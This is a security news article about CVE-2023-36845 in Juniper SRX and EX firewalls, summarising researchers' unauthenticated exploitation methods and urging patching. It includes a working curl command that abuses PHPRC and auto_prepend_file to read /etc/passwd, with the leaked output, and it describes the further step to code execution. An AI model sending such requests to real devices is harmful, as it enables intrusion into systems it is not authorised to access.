Juniper Firewalls Vulnerable to Unauthenticated Code Execution


At the end of August 2023, Juniper Networks released a security advisory mentioning the CVE-2023-36845 vulnerability affecting SRX and EX series firewalls. The vulnerability was categorized as a Medium (5.3) severity vulnerability. 

Following this, security researchers at watchtowr published a method that could exploit this vulnerability along with the proof of concept. This particular report included the exploitation of the do_fileUpload function inside the webauth_operation.php file in the J-Web interface of the SRX firewalls. 

After this method, several threat actors started to target the webauth_operation.php file to exploit vulnerable Juniper Firewalls.

Security researchers have discovered a new method that could perform an unauthenticated remote code execution without uploading any files (watchTowr method).

Document

Get a Demo

With DoControl, you can keep your SaaS applications and data safe and secure by creating workflows tailored to your needs. It’s an easy and efficient way to identify and manage risks. You can mitigate the risk and exposure of your organization’s SaaS applications in just a few simple steps.

File Upload Not available = PHPRC + cURL

As part of the analysis, researchers purchased an SRX210 firewall and tried to exploit it using the watchTowr file upload method. Unfortunately, it was not possible as the do_fileUpload was unavailable on the specified firewall.

On investigating further, researchers discovered that Juniper firewalls use an Appweb server which invokes a CGI script. This CGI script uses multiple environment variables and arguments for accessing the user’s HTTP request. Additionally, these firewalls run on FreeBSD that can access stdin by opening /dev/fd/0.

Initially, a curl request was sent with the auto_prepend_file=”/etc/passwd” which resulted in successfully leaking the information of the /etc/passwd file.

However, in order to achieve remote code execution, researchers enabled the allow_url_include feature and sent a curl request to the firewall.

This time, the request included allow_url_include,  auto_prepend_file and data:// (embedded with  ) which resulted in an unauthenticated code execution. 

$ curl “http://10.12.72.1/” -F $’auto_prepend_file=”/etc/passwdn”‘ -F ‘PHPRC=/dev/fd/0’
root:*:0:0:Charlie &:/root:/bin/csh
daemon:*:1:1:Owner of many system processes:/root:/sbin/nologin
operator:*:2:5:System &:/:/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/sbin/nologin
games:*:7:13:Games pseudo-user:/usr/games:/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/sbin/nologin
ext:*:39:39:External applications:/:/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/sbin/nologin



 
    Log In – Juniper Web Device Manager
 
Unauthenticated RCE Output (Source: VulnCheck)

Furthermore, a complete report has been published by Vulncheck, which also included shocking information that nearly 15,000 internet-facing Juniper firewalls were yet to be patched. 

Nevertheless, researchers also published a GitHub repository that contains a scanner that generates an error on affected systems by setting the LD_PRELOAD environment variable.

Organizations using Juniper Firewalls are recommended to upgrade to the latest version as per the security advisory released by Juniper Networks in order to prevent threat actors from leveraging these methods for exploitation.

Keep informed about the latest Cyber Security News by following us on Google News, Linkedin, Twitter, and Facebook.





Source link